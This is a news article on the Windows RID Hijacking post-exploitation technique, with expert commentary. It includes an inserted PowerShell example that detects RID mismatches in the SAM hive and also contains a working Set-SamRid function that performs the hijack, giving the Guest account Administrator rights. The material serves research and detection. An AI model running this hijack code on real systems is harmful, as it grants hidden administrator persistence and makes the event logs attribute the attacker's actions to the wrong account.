Security researchers have documented a new post-exploitation technique, called RID Hijacking, that could let an attacker give the built-in Guest account on a Windows machine the rights of the Administrator account.
According to a blog post by Sebastián Castro at CSL Labs, using only operating-system resources it is possible to hijack the RID of any existing local account on the victim (even the built-in Administrator account, RID 500) and assign it to another user account. The technique is reported to work on Windows XP, Windows Server 2003, Windows 8.1 and Windows 10.
He said the attack assigns the privileges of the hijacked account to the hijacker account, even if the hijacked account is disabled. It also allows authentication with the hijacker account's credentials (remotely as well, depending on the machine's configuration) and obtains authorised access as the hijacked user.
Any operation the attacker executes is also recorded in the event log as the hijacked user, despite the attacker being logged in as the hijacker.
The attack abuses the Relative Identifier (RID), the final component of a Windows security identifier (SID) that distinguishes one account from another on the same machine. For local accounts this information lives in the Security Account Manager (SAM) registry hive, and the SID built from it determines what the user is permitted to do.
In the demonstrated case it hijacks the built-in Administrator account (RID 500) and assigns it to the built-in Guest account (RID 501). The hijack rewrites the Guest account's entry in the SAM registry keys, changing the RID copy stored there to 500, so that Windows treats the Guest account as the Administrator.
"The RID hijack consists of overwriting these bytes by setting the intended RID in the F value at the mentioned offset (i.e. F4 01). Because of an integrity issue, changing this binary will make Windows assume the identity of the hijacker account as the hijacked one in most of the critical OS processes, giving access as was mentioned above. This can be done not only using the built-in accounts, but also with custom local users," said Castro.
Once this has been done, an attacker can run cmd.exe as an administrator and write to protected folders such as System32.
In a recent presentation on the attack, Castro said the hack was still an issue as Windows "does not check if the RID associated with the user is consistent to the RID copy" and "does not corroborate the RID with the username before creating the access token."
The researcher has also written a Metasploit post-exploitation module (post/windows/manage/rid_hijack) that automates the attack for penetration testers.
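As an added example (not the article's, Castro's, or the Metasploit module's own code), the PowerShell below does the two things a practitioner would want from the description above: it reads each local account's F value from the SAM hive and compares the RID copy stored there with the RID in the key name, which is the consistency check Castro says Windows never performs, and, for a lab machine, it performs the hijack write itself. It assumes it is run as SYSTEM (HKLM\SAM is not readable by administrators by default; launching it with `psexec -s -i powershell.exe` is one way) and that the RID copy sits at offset 0x30 of the F value, the offset used in Castro's original write-up and the Metasploit module rather than one stated in this article. The function names and the parsing of the username out of the V value are the example's own.

```powershell
# Added example for this article (not code from Castro's post or the Metasploit module).
# Assumptions: runs on Windows as NT AUTHORITY\SYSTEM, and the RID copy lives at offset 0x30
# of each account's F value (the offset from Castro's write-up and the Metasploit module).

$UsersKey  = 'HKLM:\SAM\SAM\Domains\Account\Users'   # one subkey per local account, named by RID in hex (000001F4 = 500, 000001F5 = 501)
$RidOffset = 0x30

function Get-SamUserName {
    param([byte[]]$V)
    # The V value header stores the username's offset (relative to 0xCC) and its byte length;
    # the UTF-16LE name follows. This is the layout used by pwdump/samdump2-style tools.
    $offset = [BitConverter]::ToInt32($V, 0x0C) + 0xCC
    $length = [BitConverter]::ToInt32($V, 0x10)
    [Text.Encoding]::Unicode.GetString($V, $offset, $length)
}

function Get-SamRidConsistency {
    # Detection: compare the RID implied by each account's key name with the RID copy inside its F value.
    # A mismatch is exactly the inconsistency that Windows itself does not check before building a token.
    Get-ChildItem -Path $UsersKey |
        Where-Object { $_.PSChildName -match '^[0-9A-F]{8}$' } |
        ForEach-Object {
            $props     = Get-ItemProperty -Path $_.PSPath
            $keyRid    = [Convert]::ToUInt32($_.PSChildName, 16)
            $storedRid = [BitConverter]::ToUInt32($props.F, $RidOffset)
            [pscustomobject]@{
                User      = Get-SamUserName -V $props.V
                KeyRid    = $keyRid
                StoredRid = $storedRid
                Hijacked  = ($keyRid -ne $storedRid)
            }
        }
}

function Set-SamRid {
    # The hijack itself, for a lab box only: overwrite one account's RID copy with another RID.
    # Set-SamRid -TargetRid 501 -NewRid 500 writes F4 01 00 00 into Guest's F value (the bytes Castro quotes);
    # Set-SamRid -TargetRid 501 -NewRid 501 reverts it.
    param(
        [Parameter(Mandatory)][uint32]$TargetRid,
        [Parameter(Mandatory)][uint32]$NewRid
    )
    $keyPath = Join-Path -Path $UsersKey -ChildPath ('{0:X8}' -f $TargetRid)
    $F = (Get-ItemProperty -Path $keyPath -Name F).F
    [BitConverter]::GetBytes($NewRid).CopyTo($F, $RidOffset)   # 4 bytes, little-endian
    Set-ItemProperty -Path $keyPath -Name F -Value $F -Type Binary
}

# Hunting run: list every local account and flag any whose stored RID disagrees with its key name.
Get-SamRidConsistency | Format-Table -AutoSize
```

Because the event log attributes the attacker's actions to the hijacked account, log-based hunting is weak here; the registry comparison above, run periodically or from an offline copy of the SAM hive, is the reliable check. If Sysmon is deployed, a registry value-set event (Event ID 13) on `HKLM\SAM\SAM\Domains\Account\Users\*\F` catches the write at the moment it happens.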
Nicholas Griffin, senior cyber security specialist at Performanta, told SC Media UK that this technique only works if the attacker can already gain system-level privileges, "and if that happens then it’s already game over".
"The key benefit of RID hijacking is that leveraging existing accounts is a lot stealthier than creating a new account or constantly elevating privileges, both of which are more easily detectable. This means that an attacker may remain persistent in the network for longer," he said.
"Defending against this involves a combination of disabling local admin permissions for standard user accounts, keeping up with Windows updates, and deploying a strong endpoint security tool. Forensic endpoint monitoring solutions can detect this technique, or at the very least allow your SOC team to discover it through regular or automated threat hunting."
Leigh-Anne Galloway, cyber security resilience lead at Positive Technologies, told SC Media UK that what is particularly interesting about this technique is, firstly, that it does not need to run any exploit to work: an attacker only needs access to a registry editor such as regedit.
"These tools are pretty essential when you have isolated systems - like ICS terminals or ATMs - and it can be very useful for an attacker trying to bypass application control tools (frameworks from major vendors for preventing the launching of malicious software). Secondly, Microsoft’s reaction – or lack thereof – is notable. The company had almost no response to this finding and haven’t fixed it yet, although thankfully no one has detected this technique in the wild so far," she said.